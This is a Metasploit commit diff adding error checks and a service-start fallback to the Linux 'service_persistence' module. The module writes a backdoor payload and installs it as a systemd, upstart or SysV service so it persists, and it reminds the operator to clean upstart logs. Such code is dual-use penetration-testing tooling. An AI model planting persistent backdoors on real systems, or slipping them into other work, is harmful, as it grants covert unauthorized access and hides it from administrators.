Land rapid7#8491, fixes for service_persistence

Author: egypt

modules/exploits/linux/local/service_persistence.rb

@@ -81,6 +81,9 @@ def initialize(info = {})
 
   def exploit
     backdoor = write_shell(datastore['SHELLPATH'])
+    if backdoor.nil?
+      return
+    end
     path = backdoor.split('/')[0...-1].join('/')
     file = backdoor.split('/')[-1]
     case target.name
@@ -120,8 +123,13 @@ def write_shell(path)
     backdoor = "#{path}/#{file_name}"
     vprint_status("Writing backdoor to #{backdoor}")
     write_file(backdoor, payload.encoded)
-    cmd_exec("chmod 711 #{backdoor}")
-    backdoor
+    if file_exist?(backdoor)
+      cmd_exec("chmod 711 #{backdoor}")
+      backdoor
+    else
+      print_error('File not written, check permissions.')
+      return
+    end
   end
 
   def systemd(backdoor_path, backdoor_file)
@@ -139,8 +147,13 @@ def systemd(backdoor_path, backdoor_file)
 WantedBy=multi-user.target}
 
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
-    vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
-    write_file("/lib/systemd/system/#{service_filename}.service", script)
+    service_name = "/lib/systemd/system/#{service_filename}.service"
+    vprint_status("Writing service: #{service_name}")
+    write_file(service_name, script)
+    if !file_exist?(service_name)
+      print_error('File not written, check permissions.')
+      return
+    end
     vprint_status('Enabling service')
     cmd_exec("systemctl enable #{service_filename}.service")
     vprint_status('Starting service')
@@ -162,8 +175,13 @@ def upstart(backdoor_path, backdoor_file, runlevel)
 respawn limit unlimited}
 
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
-    vprint_status("Writing service: /etc/init/#{service_filename}.conf")
-    write_file("/etc/init/#{service_filename}.conf", script)
+    service_name = "/etc/init/#{service_filename}.conf"
+    vprint_status("Writing service: #{service_name}")
+    write_file(service_name, script)
+    if !file_exist?(service_name)
+      print_error('File not written, check permissions.')
+      return
+    end
     vprint_status('Starting service')
     cmd_exec("initctl start #{service_filename}")
     vprint_status("Dont forget to clean logs: /var/log/upstart/#{service_filename}.log")
@@ -203,7 +221,8 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
         echo \"Already started\"
     else
         echo \"Starting $name\"
-        cd \"$dir\"}
+        cd \"$dir\"
+}
 
     if has_updatercd
       script << "        sudo $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
@@ -267,14 +286,23 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
 exit 0}
 
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
-    vprint_status("Writing service: /etc/init.d/#{service_filename}")
-    write_file("/etc/init.d/#{service_filename}", script)
-    cmd_exec("chmod 755 /etc/init.d/#{service_filename}")
+    service_name = "/etc/init.d/#{service_filename}"
+    vprint_status("Writing service: #{service_name}")
+    write_file(service_name, script)
+    if !file_exist?(service_name)
+      print_error('File not written, check permissions.')
+      return
+    end
+    cmd_exec("chmod 755 #{service_name}")
     vprint_status('Enabling & starting our service')
     if has_updatercd
       cmd_exec("update-rc.d #{service_filename} defaults")
       cmd_exec("update-rc.d #{service_filename} enable")
-      cmd_exec("service #{service_filename} start")
+      if file_exist?('/usr/sbin/service') # some systems have update-rc.d but not service binary, have a fallback just in case
+        cmd_exec("service #{service_filename} start")
+      else
+        cmd_exec("/etc/init.d/#{service_filename} start")
+      end
     else # CentOS
       cmd_exec("chkconfig --add #{service_filename}")
       cmd_exec("chkconfig #{service_filename} on")